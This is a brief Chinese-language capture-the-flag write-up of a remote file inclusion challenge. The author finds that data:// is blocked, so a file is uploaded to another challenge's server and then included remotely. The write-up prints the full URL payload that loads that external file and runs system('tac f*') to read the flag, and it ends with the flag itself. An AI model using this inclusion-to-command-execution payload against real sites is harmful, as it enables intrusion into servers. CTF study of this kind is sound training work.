这道题可以远程查看外部文件,尝试用data协议执行恶意文件
_1c082d26.png)
这里被禁止了,用外部链接让它读取恶意文件,开了一个文件上传的题目用文件上传题目的服务器给这个题目读恶意文件,在文件上传的题目中上传一个123.txt
内容:
_ab3664f1.png)
然后让这道题去读取这个文件
_08d8268a.png)
成功读取道,用代码中的1参数执行命令得到flag
Payload:?path=http%3A%2F%2Fa5e91015-92c8-4e39-bfea-78d3ff0af054.node5.buuoj.cn%3A81%2Fuplo4d%2Fb52f6f78c93f7934d640cc67ae99fbd1.txt&1=system(%27tac%20f*%27);
_67d2f38c.png)
CTF{http_rfi_1s_fun}